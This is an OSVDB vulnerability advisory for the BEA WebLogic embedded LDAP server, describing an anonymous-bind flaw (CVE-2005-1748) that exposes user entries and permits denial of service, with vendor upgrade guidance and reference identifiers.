BEA WebLogic LDAP Server Anonymous Bind

2005-05-24T08:59:34
ID OSVDB:16839
Type osvdb
Reporter OSVDB
Modified 2005-05-24T08:59:34

Description

Vulnerability Description

WebLogic LDAP server contains a flaw that may lead to an unauthorized information disclosure and also allow a remote denial of service. The issue is triggered when a remote user anonymously binds to the embedded LDAP server which will disclose user entries (but not attributes) if the schema can be guessed. It is also possible to launch a denial of service against the LDAP server by creating multiple connections using this anonymous bind. This will result in a lost of confidentiality and availability of the LDAP service.

Solution Description

For WebLogic version 8.1, upgrade to version 8.1 SP4 first and apply the patch released by the vendor. For WebLogic version 7.0, upgrade to version 7.0 SP6 as it has been reported to fix this vulnerability.

Short Description

WebLogic LDAP server contains a flaw that may lead to an unauthorized information disclosure and also allow a remote denial of service. The issue is triggered when a remote user anonymously binds to the embedded LDAP server which will disclose user entries (but not attributes) if the schema can be guessed. It is also possible to launch a denial of service against the LDAP server by creating multiple connections using this anonymous bind. This will result in a lost of confidentiality and availability of the LDAP service.

References:

Vendor URL: http://www.bea.com/ Vendor Specific Advisory URL Security Tracker: 1014049 Secunia Advisory ID:15486 Keyword: BEA05-81.00 CVE-2005-1748 Bugtraq ID: 13717